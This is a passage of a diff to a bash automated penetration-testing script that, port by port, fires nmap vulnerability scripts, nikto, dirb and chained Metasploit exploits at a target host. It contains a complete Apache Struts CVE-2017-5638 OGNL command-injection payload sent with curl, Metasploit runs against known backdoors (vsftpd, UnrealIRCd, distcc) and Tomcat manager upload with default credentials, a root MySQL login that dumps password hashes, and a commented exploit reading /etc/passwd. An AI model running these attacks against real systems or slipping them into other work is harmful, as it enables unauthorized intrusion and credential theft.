msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1023,7 +1033,7 @@ else
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb https://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -1053,14 +1063,20 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
if [ -z $GHDB ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET"
goohak $TARGET > /dev/null
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
@@ -1079,7 +1095,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1112,7 +1128,7 @@ then
echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET
nmap -A -sV -T5 --script=ms-sql* -p 1433 $TARGET
fi
if [ -z "$port_2049" ];
@@ -1120,7 +1136,7 @@ then
echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
rpcinfo -p $TARGET
showmount -e $TARGET
smbclient -L $TARGET -U " "%" "
@@ -1131,7 +1147,7 @@ then
echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -1140,7 +1156,7 @@ then
echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
nmap -A -sV --script=mysql* -p 3306 $TARGET
nmap -A -sV --script=mysql* -p 3306 $TARGET
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
fi
@@ -1149,7 +1165,7 @@ then
echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
fi
if [ -z "$port_3128" ];
@@ -1157,7 +1173,7 @@ then
echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
fi
if [ -z "$port_3389" ];
@@ -1165,7 +1181,7 @@ then
echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
rdesktop $TARGET &
fi
@@ -1174,7 +1190,7 @@ then
echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
fi
@@ -1195,7 +1211,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:4443
cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
nmap -A -p 4443 -T5 --script=*proxy* $TARGET
nmap -sV -A -p 4443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_5432" ];
@@ -1203,7 +1219,7 @@ then
echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
fi
if [ -z "$port_5800" ];
@@ -1211,7 +1227,7 @@ then
echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
fi
if [ -z "$port_5900" ];
@@ -1219,7 +1235,7 @@ then
echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
fi
if [ -z "$port_5984" ];
@@ -1227,7 +1243,7 @@ then
echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
fi
@@ -1236,7 +1252,8 @@ then
echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
msfconsole -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;"
fi
if [ -z "$port_6667" ];
@@ -1244,7 +1261,7 @@ then
echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
@@ -1261,6 +1278,7 @@ else
cd ..
nikto -h http://$TARGET:8000
cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
fi
if [ -z "$port_8100" ];
@@ -1279,6 +1297,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8100
cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
fi
if [ -z "$port_8080" ];
@@ -1297,7 +1316,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8080
cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
nmap -A -p 8080 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
@@ -1320,7 +1339,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8180
cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
nmap -p 8180 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
@@ -1343,7 +1362,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:8443
cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
nmap -A -p 8443 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_8888" ];
@@ -1358,6 +1377,7 @@ else
xsstracer $TARGET 8888
nikto -h http://$TARGET:8888
cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8888 -T5 $TARGET
fi
if [ -z "$port_10000" ];
@@ -1375,7 +1395,7 @@ then
echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
nmap -p 27017 -T5 --script=mongodb* $TARGET
nmap -sV --script -p 27017 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27018" ];
@@ -1383,7 +1403,7 @@ then
echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
nmap -p 27018 -T5 --script=mongodb* $TARGET
nmap -sV -p 27018 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27019" ];
@@ -1391,7 +1411,7 @@ then
echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
nmap -p 27019 -T5 --script=mongodb* $TARGET
nmap -sV -p 27019 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_28017" ];
@@ -1399,7 +1419,7 @@ then
echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
nmap -p 28017 -T5 --script=mongodb* $TARGET
nmap -sV -p 28017 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_49152" ];
@@ -1419,7 +1439,7 @@ if [ "$FULLNMAPSCAN" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
if [ "$AUTOBRUTE" = "0" ]; then